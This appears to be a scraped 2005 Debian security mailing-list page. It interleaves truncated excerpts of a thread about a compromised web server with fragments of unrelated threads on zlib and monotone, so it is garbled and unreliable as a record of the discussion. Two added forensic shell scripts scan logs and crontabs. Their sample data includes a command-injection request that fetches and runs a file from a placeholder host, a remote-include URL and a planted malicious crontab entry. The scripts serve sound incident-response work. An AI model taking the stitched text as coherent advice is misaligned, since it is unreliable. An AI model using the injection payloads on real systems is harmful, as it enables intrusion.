Hi!
I think one of my servers has been compromised. Since I don't have a lot
of experience with these things, I beg you for your help.
The information I have gathered so far is the following. The server
is running the latest Debian stable, sarge.
There was heavy traffic on the server and
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
I think one of my servers has been compromised. Since I don't have a lot
of experience with these things, I beg you for your help.
The information I have gathered so far is the following. The server
is running the latest Debian
Christoph Haas wrote:
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
It should be rather easy to find signs of weird accesses like %20 or
chr(). Also look for weird signs in /tmp.
If your server is important you should consider reinstalling.
I'd urge you to spend the time
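As an added example (not code from the thread or from any of the posters): a small POSIX sh script that scans an Apache combined-format access log for the request patterns mentioned above (%20, chr()) and the other usual markers of remote-include and command-injection attempts, then narrows the hits to one client and to the minutes before the START time ps showed for the rogue process. The log lines it builds are constructed for the demonstration; the addresses, filenames and the regexes are my assumptions, not anything seen on the poster's server.

```shell
#!/bin/sh
# Added example, not code from the thread. Scans an Apache combined-format
# access log for the request patterns Christoph Haas mentions (%20, chr())
# plus the other usual 2005-era markers of remote-include and command
# injection, then narrows the hits to one client and the minutes before the
# START time ps reported for the rogue process.

# Print every log line whose request field looks like an injection attempt.
# $1: path to an access log. The patterns are assumptions about what is
# worth a look, not a definitive signature list.
scan_access_log() {
    grep -iE \
        -e '%20' \
        -e 'chr\(' \
        -e '=(https?|ftp)(%3a|:)(%2f%2f|//)' \
        -e '(%3b|%7c|[;|])(%20|\+| )*(wget|curl|lynx|fetch|chmod|perl|sh|cd)' \
        "$1"
}

# Number of suspicious lines (0 when clean).
count_suspicious() {
    scan_access_log "$1" | wc -l | tr -d ' '
}

# Unique client addresses behind the suspicious requests: pull everything
# those hosts did before deciding what else was touched.
suspicious_sources() {
    scan_access_log "$1" | awk '{ print $1 }' | sort -u
}

# All requests from one client at or before HH:MM (the START column of ps),
# within the same log day. $1 log, $2 client IP, $3 HH:MM
requests_before() {
    awk -v ip="$2" -v t="$3" '
        $1 == ip {
            split($4, a, ":")            # [24/Jul/2005:17:29:58 -> a[2]=17 a[3]=29
            if ((a[2] ":" a[3]) <= t) print
        }' "$1"
}

# Constructed sample log so the script runs offline. Addresses are RFC 1918
# or TEST-NET; the requests are made up to exercise each rule above.
make_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [24/Jul/2005:17:29:58 +0200] "GET /index.php?page=about HTTP/1.0" 200 2311 "-" "Mozilla/4.0"
10.0.0.9 - - [24/Jul/2005:17:30:41 +0200] "GET /index.php?page=http://192.0.2.10/x.txt? HTTP/1.0" 200 412 "-" "Mozilla/4.0"
10.0.0.9 - - [24/Jul/2005:17:30:42 +0200] "GET /app/view.php?file=|cd%20/tmp;wget%20192.0.2.10/x;sh%20x| HTTP/1.0" 200 0 "-" "Mozilla/4.0"
10.0.0.9 - - [24/Jul/2005:17:30:50 +0200] "GET /forum/index.php?id=1%20and%20chr(97)=chr(97) HTTP/1.0" 200 9811 "-" "Mozilla/4.0"
10.0.0.7 - - [24/Jul/2005:17:31:03 +0200] "GET /images/logo.png HTTP/1.1" 200 4520 "-" "Mozilla/5.0"
EOF
}

# Usage on a real box: scan_access_log /var/log/apache/access.log, then
# requests_before /var/log/apache/access.log <ip> 17:31 for the minutes
# leading up to the process start; repeat per virtual host log.
```

The %20 rule on its own is noisy (any encoded space in a legitimate URL trips it), which is why the script also pulls out the source addresses and lets you look at everything one client did just before the process start time rather than judging single lines.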
On Sun, Jul 10, 2005 at 03:59:43PM +0200, Florian Weimer wrote:
On my system, the following packages contain statically linked copies
of zlib-related code:
I'm still interested in a full list of packages statically linked
to any version of zlib.
We had a few advisories about zlib so far:
DSA-763
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:
Since the process runs as www-data some kiddy has abused a web service
on your server to download and run external software. Look for
suspicious log lines of your web server.
Yes ..
Examples of hacks on our servers:
Hello,
This letter is addressed to the monotone mailing list as well as the
debian maintainer of the lua shared library in Debian and the
debian-security mailing list.
Background:
Monotone is currently linked statically against its own copy of the
lua library. The monotone authors' motivation
Thanks for your help. I didn't make much progress though. However, after
killing all these processes, a new one was run
www-data  6059  0.0  0.1  1616  600  ?  S  17:31  0:00 /tmp/dlciiqlno x
that means that the process was started at 17:31 today. So I checked
logs (all virtual
On Sun, Jul 24, 2005 at 07:40:21PM +0200, Nejc Novak wrote:
that means that the process was started at 17:31 today. So I checked
I killed the process and webserver and at 19:31 the process again
started with the same lines in syslog.
Check your crontabs (in various locations) and atq. It
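An added example illustrating the "check your crontabs (in various locations) and atq" advice; it is not the poster's or the list's code. The script walks every scheduled-job location on a Debian system under a root prefix, so the same code can be pointed at a mounted image of the suspect disk instead of the live system, and flags entries that run as www-data or reference /tmp or a download tool. The sample tree and the planted `31 */2 * * *` entry are constructed: the thread found nothing in cron, and the cadence only mirrors the 17:31/19:31/21:31 starts reported above.

```shell
#!/bin/sh
# Added example, not the poster's or the list's code. Walks every place a
# Debian (sarge-era) system schedules jobs and prints the live entries, then
# flags the ones worth a second look. ROOT is a prefix so the same code runs
# against a mounted image of the suspect disk (ROOT=/mnt/evidence) instead
# of trusting the possibly rootkitted live system.

# Print "file: entry" for each non-comment line in every cron/at location.
# $1: root prefix ("" for the live system)
list_scheduled_jobs() {
    root=${1:-}
    for f in "$root"/etc/crontab \
             "$root"/etc/cron.d/* \
             "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
             "$root"/etc/cron.weekly/* "$root"/etc/cron.monthly/* \
             "$root"/var/spool/cron/crontabs/* \
             "$root"/var/spool/cron/atjobs/*; do
        [ -f "$f" ] || continue
        # show the path relative to ROOT so an image mounted under /tmp
        # does not itself trip the /tmp check below
        rel=${f#"$root"}
        grep -vE '^[[:space:]]*(#|$)' "$f" | sed "s|^|$rel: |" || true
    done
}

# Entries that run as www-data (or sit in www-data's per-user crontab),
# point at world-writable or volatile places, or call a download tool.
suspicious_jobs() {
    list_scheduled_jobs "$1" | grep -iE 'www-data|/tmp|/var/tmp|/dev/shm|wget|curl' || true
}

# Constructed sample tree: a normal /etc/crontab plus a planted per-user
# crontab for www-data firing at :31 every two hours. This mirrors the
# 17:31/19:31/21:31 starts in the thread; nothing like it was found there.
make_sample_root() {
    mkdir -p "$1/etc/cron.d" "$1/var/spool/cron/crontabs"
    printf '# /etc/crontab: system-wide crontab\n17 * * * *  root  run-parts --report /etc/cron.hourly\n' > "$1/etc/crontab"
    printf '31 */2 * * * /tmp/.x/run >/dev/null 2>&1\n' > "$1/var/spool/cron/crontabs/www-data"
}

# Usage on the live box: list_scheduled_jobs ""; suspicious_jobs ""
# Queued one-shot jobs: atq, then at -c <jobnumber> to read each one.
```

A clean result here is still informative: if nothing in cron or at explains a process that returns every two hours, the spawner is a running process (a parent shell, a daemon started from the web tree, or the web server re-triggered by a request), and the next place to look is the parent chain of the new PID rather than the scheduler.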
I checked crontabs and I haven't found anything, but new processes started
www-data  6705  0.0  0.1  1616  600  ?  S  21:31  0:00 /tmp/dlciiqlno x
www-data  6762  0.0  0.0     0    0  ?  Z  22:10  0:00 [sh] <defunct>
www-data  6770  0.0  0.1  1624  608  ?  S  22:10
Reinstall seems the option left...with the added security features discussed
previously, monitoring the server closely after new installation. I would
do the new installation on a new hard disk, saving and afterwards,
installing the seemingly compromised hard disk, for a forensic analysis in
a
In article [EMAIL PROTECTED] you wrote:
I still haven't managed to find out how exactly this happened. And
probably reinstall will be needed? What do you think?
Yes, reinstall on compromised hosts is always needed, however you should
make an image of the system for forensics; you don't want to
On the 12989th day after Epoch,
Nejc Novak wrote:
I checked crontabs and I haven't found anything, but new processes started
www-data  6705  0.0  0.1  1616  600  ?  S  21:31  0:00 /tmp/dlciiqlno x
www-data  6762  0.0  0.0     0    0  ?  Z  22:10  0:00 [sh] <defunct>